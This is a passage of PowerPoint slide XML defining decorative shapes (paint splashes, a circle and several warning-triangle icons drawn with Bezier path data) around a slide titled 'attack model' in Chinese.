          <a:xfrm>
            <a:off x="8841372" y="3694816"/>
            <a:ext cx="1277847" cy="1262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" name="油漆泼溅"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4872666" y="5838158"/>
            <a:ext cx="871681" cy="860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5" name="油漆泼溅"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9044455" y="2521129"/>
            <a:ext cx="871681" cy="860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攻击模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攻击模型</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="208" name="油漆泼溅"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5728769" y="5249071"/>
            <a:ext cx="1277847" cy="1262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49622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8" name="成组"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4161206" y="3515376"/>
            <a:ext cx="4600057" cy="4619334"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="4600056" cy="4619333"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="209" name="圆形"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="325213" y="348743"/>
              <a:ext cx="4031962" cy="4031962"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="80878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" name="警告符号"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2038971" y="0"/>
              <a:ext cx="604445" cy="604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600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="10685" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="9798" y="0"/>
                    <a:pt x="9001" y="498"/>
                    <a:pt x="8605" y="1300"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="248" y="18197"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="-115" y="18931"/>
                    <a:pt x="-79" y="19786"/>
                    <a:pt x="348" y="20484"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="775" y="21183"/>
                    <a:pt x="1515" y="21600"/>
                    <a:pt x="2327" y="21600"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="19042" y="21600"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="19853" y="21600"/>
                    <a:pt x="20593" y="21183"/>
                    <a:pt x="21020" y="20484"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21447" y="19786"/>
                    <a:pt x="21485" y="18931"/>
                    <a:pt x="21122" y="18197"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="12765" y="1300"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12369" y="498"/>
                    <a:pt x="11572" y="0"/>
                    <a:pt x="10685" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="10685" y="744"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="11291" y="744"/>
                    <a:pt x="11836" y="1084"/>
                    <a:pt x="12108" y="1632"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20464" y="18530"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="20712" y="19032"/>
                    <a:pt x="20686" y="19615"/>
                    <a:pt x="20394" y="20093"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20102" y="20570"/>
                    <a:pt x="19597" y="20856"/>
                    <a:pt x="19042" y="20856"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2327" y="20856"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1772" y="20856"/>
                    <a:pt x="1266" y="20570"/>
                    <a:pt x="974" y="20093"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="683" y="19615"/>
                    <a:pt x="658" y="19032"/>
                    <a:pt x="906" y="18530"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="9262" y="1632"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9534" y="1084"/>
                    <a:pt x="10079" y="744"/>
                    <a:pt x="10685" y="744"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="10685" y="1384"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10315" y="1384"/>
                    <a:pt x="9996" y="1585"/>
                    <a:pt x="9830" y="1919"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1472" y="18817"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1323" y="19118"/>
                    <a:pt x="1338" y="19470"/>
                    <a:pt x="1514" y="19757"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1689" y="20044"/>
                    <a:pt x="1993" y="20214"/>
                    <a:pt x="2327" y="20214"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="19042" y="20214"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="19375" y="20214"/>
                    <a:pt x="19679" y="20044"/>
                    <a:pt x="19855" y="19757"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20030" y="19470"/>
                    <a:pt x="20046" y="19118"/>
                    <a:pt x="19896" y="18817"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="11540" y="1919"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11374" y="1585"/>
                    <a:pt x="11055" y="1384"/>
                    <a:pt x="10685" y="1384"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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1" name="警告符号"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2038971" y="4014986"/>
              <a:ext cx="604445" cy="604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600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="10685" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="9798" y="0"/>
                    <a:pt x="9001" y="498"/>
                    <a:pt x="8605" y="1300"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="248" y="18197"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="-115" y="18931"/>
                    <a:pt x="-79" y="19786"/>
                    <a:pt x="348" y="20484"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="775" y="21183"/>
                    <a:pt x="1515" y="21600"/>
                    <a:pt x="2327" y="21600"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="19042" y="21600"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="19853" y="21600"/>
                    <a:pt x="20593" y="21183"/>
                    <a:pt x="21020" y="20484"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21447" y="19786"/>
                    <a:pt x="21485" y="18931"/>
                    <a:pt x="21122" y="18197"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="12765" y="1300"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12369" y="498"/>
                    <a:pt x="11572" y="0"/>
                    <a:pt x="10685" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="10685" y="744"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="11291" y="744"/>
                    <a:pt x="11836" y="1084"/>
                    <a:pt x="12108" y="1632"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20464" y="18530"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="20712" y="19032"/>
                    <a:pt x="20686" y="19615"/>
                    <a:pt x="20394" y="20093"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20102" y="20570"/>
                    <a:pt x="19597" y="20856"/>
                    <a:pt x="19042" y="20856"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2327" y="20856"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1772" y="20856"/>
                    <a:pt x="1266" y="20570"/>
                    <a:pt x="974" y="20093"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="683" y="19615"/>
                    <a:pt x="658" y="19032"/>
                    <a:pt x="906" y="18530"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="9262" y="1632"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9534" y="1084"/>
                    <a:pt x="10079" y="744"/>
                    <a:pt x="10685" y="744"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="10685" y="1384"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10315" y="1384"/>
                    <a:pt x="9996" y="1585"/>
                    <a:pt x="9830" y="1919"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1472" y="18817"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1323" y="19118"/>
                    <a:pt x="1338" y="19470"/>
                    <a:pt x="1514" y="19757"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1689" y="20044"/>
                    <a:pt x="1993" y="20214"/>
                    <a:pt x="2327" y="20214"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="19042" y="20214"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="19375" y="20214"/>
                    <a:pt x="19679" y="20044"/>
                    <a:pt x="19855" y="19757"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20030" y="19470"/>
                    <a:pt x="20046" y="19118"/>
                    <a:pt x="19896" y="18817"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="11540" y="1919"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11374" y="1585"/>
                    <a:pt x="11055" y="1384"/>
                    <a:pt x="10685" y="1384"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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" name="警告符号"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3995612" y="2062550"/>
              <a:ext cx="604445" cy="604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600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="10685" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="9798" y="0"/>
                    <a:pt x="9001" y="498"/>
                    <a:pt x="8605" y="1300"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="248" y="18197"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="-115" y="18931"/>
                    <a:pt x="-79" y="19786"/>
                    <a:pt x="348" y="20484"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="775" y="21183"/>
                    <a:pt x="1515" y="21600"/>
                    <a:pt x="2327" y="21600"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="19042" y="21600"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="19853" y="21600"/>
                    <a:pt x="20593" y="21183"/>
                    <a:pt x="21020" y="20484"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21447" y="19786"/>
                    <a:pt x="21485" y="18931"/>
                    <a:pt x="21122" y="18197"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="12765" y="1300"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12369" y="498"/>
                    <a:pt x="11572" y="0"/>
                    <a:pt x="10685" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="10685" y="744"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="11291" y="744"/>
                    <a:pt x="11836" y="1084"/>
                    <a:pt x="12108" y="1632"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20464" y="18530"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="20712" y="19032"/>
                    <a:pt x="20686" y="19615"/>
                    <a:pt x="20394" y="20093"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20102" y="20570"/>
                    <a:pt x="19597" y="20856"/>
                    <a:pt x="19042" y="20856"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2327" y="20856"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1772" y="20856"/>
                    <a:pt x="1266" y="20570"/>
                    <a:pt x="974" y="20093"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="683" y="19615"/>
                    <a:pt x="658" y="19032"/>
                    <a:pt x="906" y="18530"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="9262" y="1632"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9534" y="1084"/>
                    <a:pt x="10079" y="744"/>
                    <a:pt x="10685" y="744"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="10685" y="1384"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10315" y="1384"/>
                    <a:pt x="9996" y="1585"/>
                    <a:pt x="9830" y="1919"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1472" y="18817"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1323" y="19118"/>
                    <a:pt x="1338" y="19470"/>
                    <a:pt x="1514" y="19757"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1689" y="20044"/>
                    <a:pt x="1993" y="20214"/>
                    <a:pt x="2327" y="20214"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="19042" y="20214"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="19375" y="20214"/>
                    <a:pt x="19679" y="20044"/>
                    <a:pt x="19855" y="19757"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20030" y="19470"/>
                    <a:pt x="20046" y="19118"/>
                    <a:pt x="19896" y="18817"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="11540" y="1919"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11374" y="1585"/>
                    <a:pt x="11055" y="1384"/>
                    <a:pt x="10685" y="1384"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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3" name="警告符号"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="2062550"/>
              <a:ext cx="604445" cy="604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600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="10685" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="9798" y="0"/>
                    <a:pt x="9001" y="498"/>
                    <a:pt x="8605" y="1300"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="248" y="18197"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="-115" y="18931"/>
                    <a:pt x="-79" y="19786"/>
                    <a:pt x="348" y="20484"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="775" y="21183"/>
                    <a:pt x="1515" y="21600"/>
                    <a:pt x="2327" y="21600"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="19042" y="21600"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="19853" y="21600"/>
                    <a:pt x="20593" y="21183"/>
                    <a:pt x="21020" y="20484"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21447" y="19786"/>
                    <a:pt x="21485" y="18931"/>
                    <a:pt x="21122" y="18197"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="12765" y="1300"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12369" y="498"/>
                    <a:pt x="11572" y="0"/>
                    <a:pt x="10685" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="10685" y="744"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="11291" y="744"/>
                    <a:pt x="11836" y="1084"/>
                    <a:pt x="12108" y="1632"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20464" y="18530"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="20712" y="19032"/>
                    <a:pt x="20686" y="19615"/>
                    <a:pt x="20394" y="20093"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20102" y="20570"/>
                    <a:pt x="19597" y="20856"/>
                    <a:pt x="19042" y="20856"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2327" y="20856"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1772" y="20856"/>
                    <a:pt x="1266" y="20570"/>
                    <a:pt x="974" y="20093"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="683" y="19615"/>
                    <a:pt x="658" y="19032"/>
                    <a:pt x="906" y="18530"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="9262" y="1632"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9534" y="1084"/>
                    <a:pt x="10079" y="744"/>
                    <a:pt x="10685" y="744"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="10685" y="1384"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10315" y="1384"/>
                    <a:pt x="9996" y="1585"/>
                    <a:pt x="9830" y="1919"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1472" y="18817"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1323" y="19118"/>
                    <a:pt x="1338" y="19470"/>
                    <a:pt x="1514" y="19757"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1689" y="20044"/>
                    <a:pt x="1993" y="20214"/>
                    <a:pt x="2327" y="20214"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="19042" y="20214"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="19375" y="20214"/>
                    <a:pt x="19679" y="20044"/>
                    <a:pt x="19855" y="19757"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20030" y="19470"/>
                    <a:pt x="20046" y="19118"/>
                    <a:pt x="19896" y="18817"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="11540" y="1919"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11374" y="1585"/>
                    <a:pt x="11055" y="1384"/>
                    <a:pt x="10685" y="1384"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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4" name="警告符号"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="591942" y="530597"/>
              <a:ext cx="604445" cy="604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600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="10685" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="9798" y="0"/>
                    <a:pt x="9001" y="498"/>
                    <a:pt x="8605" y="1300"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="248" y="18197"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="-115" y="18931"/>
                    <a:pt x="-79" y="19786"/>
                    <a:pt x="348" y="20484"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="775" y="21183"/>
                    <a:pt x="1515" y="21600"/>
                    <a:pt x="2327" y="21600"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="19042" y="21600"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="19853" y="21600"/>
                    <a:pt x="20593" y="21183"/>
                    <a:pt x="21020" y="20484"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21447" y="19786"/>
                    <a:pt x="21485" y="18931"/>
                    <a:pt x="21122" y="18197"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="12765" y="1300"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12369" y="498"/>
                    <a:pt x="11572" y="0"/>
                    <a:pt x="10685" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="10685" y="744"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="11291" y="744"/>
                    <a:pt x="11836" y="1084"/>
                    <a:pt x="12108" y="1632"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20464" y="18530"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="20712" y="19032"/>
                    <a:pt x="20686" y="19615"/>
                    <a:pt x="20394" y="20093"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20102" y="20570"/>
                    <a:pt x="19597" y="20856"/>
                    <a:pt x="19042" y="20856"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2327" y="20856"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1772" y="20856"/>
                    <a:pt x="1266" y="20570"/>
                    <a:pt x="974" y="20093"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="683" y="19615"/>
                    <a:pt x="658" y="19032"/>
                    <a:pt x="906" y="18530"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="9262" y="1632"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9534" y="1084"/>
                    <a:pt x="10079" y="744"/>
                    <a:pt x="10685" y="744"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="10685" y="1384"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10315" y="1384"/>
                    <a:pt x="9996" y="1585"/>
                    <a:pt x="9830" y="1919"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1472" y="18817"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1323" y="19118"/>
                    <a:pt x="1338" y="19470"/>
                    <a:pt x="1514" y="19757"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1689" y="20044"/>
                    <a:pt x="1993" y="20214"/>
                    <a:pt x="2327" y="20214"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="19042" y="20214"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="19375" y="20214"/>
                    <a:pt x="19679" y="20044"/>
                    <a:pt x="19855" y="19757"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20030" y="19470"/>
                    <a:pt x="20046" y="19118"/>
                    <a:pt x="19896" y="18817"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="11540" y="1919"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11374" y="1585"/>
                    <a:pt x="11055" y="1384"/>
                    <a:pt x="10685" y="1384"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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5" name="警告符号"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3486000" y="530597"/>
              <a:ext cx="604446" cy="604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600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="10685" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="9798" y="0"/>
                    <a:pt x="9001" y="498"/>
                    <a:pt x="8605" y="1300"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="248" y="18197"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="-115" y="18931"/>
                    <a:pt x="-79" y="19786"/>
                    <a:pt x="348" y="20484"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="775" y="21183"/>
                    <a:pt x="1515" y="21600"/>
                    <a:pt x="2327" y="21600"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="19042" y="21600"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="19853" y="21600"/>
                    <a:pt x="20593" y="21183"/>
                    <a:pt x="21020" y="20484"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21447" y="19786"/>
                    <a:pt x="21485" y="18931"/>
                    <a:pt x="21122" y="18197"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="12765" y="1300"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12369" y="498"/>
                    <a:pt x="11572" y="0"/>
                    <a:pt x="10685" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="10685" y="744"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="11291" y="744"/>
                    <a:pt x="11836" y="1084"/>
                    <a:pt x="12108" y="1632"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20464" y="18530"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="20712" y="19032"/>
                    <a:pt x="20686" y="19615"/>
                    <a:pt x="20394" y="20093"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20102" y="20570"/>
                    <a:pt x="19597" y="20856"/>
                    <a:pt x="19042" y="20856"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2327" y="20856"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1772" y="20856"/>
                    <a:pt x="1266" y="20570"/>
                    <a:pt x="974" y="20093"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="683" y="19615"/>
                    <a:pt x="658" y="19032"/>
                    <a:pt x="906" y="18530"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="9262" y="1632"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9534" y="1084"/>
                    <a:pt x="10079" y="744"/>
                    <a:pt x="10685" y="744"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="10685" y="1384"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10315" y="1384"/>
                    <a:pt x="9996" y="1585"/>
                    <a:pt x="9830" y="1919"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1472" y="18817"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1323" y="19118"/>
                    <a:pt x="1338" y="19470"/>
                    <a:pt x="1514" y="19757"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1689" y="20044"/>
                    <a:pt x="1993" y="20214"/>
                    <a:pt x="2327" y="20214"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="19042" y="20214"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="19375" y="20214"/>
                    <a:pt x="19679" y="20044"/>
                    <a:pt x="19855" y="19757"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20030" y="19470"/>
                    <a:pt x="20046" y="19118"/>
                    <a:pt x="19896" y="18817"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="11540" y="1919"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11374" y="1585"/>
                    <a:pt x="11055" y="1384"/>
                    <a:pt x="10685" y="1384"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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6" name="警告符号"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="591942" y="3342324"/>
              <a:ext cx="604445" cy="604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600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="10685" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="9798" y="0"/>
                    <a:pt x="9001" y="498"/>
                    <a:pt x="8605" y="1300"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="248" y="18197"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="-115" y="18931"/>
                    <a:pt x="-79" y="19786"/>
                    <a:pt x="348" y="20484"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="775" y="21183"/>
                    <a:pt x="1515" y="21600"/>
                    <a:pt x="2327" y="21600"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="19042" y="21600"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="19853" y="21600"/>
                    <a:pt x="20593" y="21183"/>
                    <a:pt x="21020" y="20484"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21447" y="19786"/>
                    <a:pt x="21485" y="18931"/>
                    <a:pt x="21122" y="18197"/>
                  </a:cubicBezTo>
                  <a:lnTo>
